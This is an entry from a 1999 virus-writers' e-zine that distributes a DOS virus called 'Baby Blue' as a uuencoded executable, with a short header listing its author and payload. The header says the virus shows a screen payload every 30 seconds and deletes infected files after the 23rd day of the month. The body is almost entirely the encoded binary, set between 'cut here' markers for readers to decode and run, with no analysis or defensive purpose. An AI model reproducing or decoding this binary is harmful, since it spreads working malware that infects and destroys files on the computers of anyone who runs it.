ฤฤฤฤฤฤฤ[PVW5.023]ฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤ
Written for the : Pinoy Virus Writers E-Zine #5

                                % % % % %

                               - = %|% = -

 ษอออ  Sources  !!!  ออออออออออออออออออออออออออออออออออออออออออป
 ศอออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออผ

Virus Name : Baby Blue
Virus Author : Zoom23 (brianjan@mailcity.com)
Screen Payload : Every 30 Sec onwards.
Deletes infected file if date greater than the 23rd day of the
month.
High Level Language virus

UUDecode it :
--------------cut here -----------
begin 644 babyblue.exe
M35K``0H`2@`5`*L#JP-2!``(``"G!0``'````&P```!Z````NP```,````#.
M````Y0```.\```#T````_0```"`!```J`0``.P$``$`!``!.`0``@0$``(\!
M``"B`0``IP$``+T!``#<`0``\P$``!("```<`@``+`(``$,"``!-`@``4@(`
M`&$"``!F`@``>0(``'X"``",`@``HP(``,("``#9`@``\@(```D#```3`P``
M,0,``#\#``!8`P``;P,``(,#``"-`P``T`,``.8#``#]`P``#00``"0$```V
M!```300``&8$``!]!```AP0``*L$``#.!```Y00``*H%``#2!0``Y04``/@%
M```+!@``'@8``%P&``"C!@``JP8``/L`:P`!`(``&P&``+4"@`!%"8``8`F`
M`'8)@`"5"8``````````````````58GE@^P&Q'X$)HH%B$;]BD;]B$;[L`$Z
M1OMW-8A&_NL#_D;^BD;^,.3$?@0#^":*!3#D+3X`B$;_BE;_BD;^,.3$?@0#
M^":(%8I&_CI&^W70B>Q=P@0``2!5B>6![`("C;X`_Q97,<!0FG$&@`"_X0<>
M5[A/`%":$P>``*`#`**O,*`$`**P,*`%`**Q,*`&`**R,*`'`**S,*`(`**T
M,,8&@S``Q@;A!0"_804>5XV^`/\65S'`4)IQ!H``FC\$@`"_804>5[@!`%":
M>@2``+]A!1Y7OP,)'E>XP!-0,<!04)IE!8``OV$%'E>:^P2``)K`!H``"<!T
M7IK`!H``B$;_L`$Z1O]W3Z(Q".L$_@8Q"(V^__X65[_A!1Y7FOD&@`"_5P`.
M5YIX!X``C;[__197H#$(,.10FG$&@`":>`>``+_A!1Y7N/\`4)H3!X``H#$(
M.D;_=;:)[%W#58GEC58$N`%#N2``S2%=P@0`58GE@>P``8V^`/\65S'`4)IQ
M!H``N#\`4+^$,!Y7F@``:P"_804>5XV^`/\65S'`4)IQ!H``FC\$@`"_804>
M5^BK_[]A!1Y7N`$`4)IZ!(``OV$%'E>AGC"+%J`P+<`3@]H`+08`@]H`4E":
MS06``+]A!1Y7O\,<'E>XP!-0,<!04)IE!8``OV$%'E>AGC"+%J`P+<`3@]H`
M+08`@]H`4E":S06``+]A!1Y7FM\$@`"_804>5S'`,=)24)K-!8``OV$%'E>_
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
M\ZO#````````````!DYH971T90````````````````````````#__P``````
M`````````````````````````````````````````````````````!!```"@
0`+``N````@``````````````
`
end
---------Cut here --------


-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ--
(C) Pinoy Virus Writers 1999
Zoom23
brianjan@mailcity.com
webmaster@hackerz.zzn.com
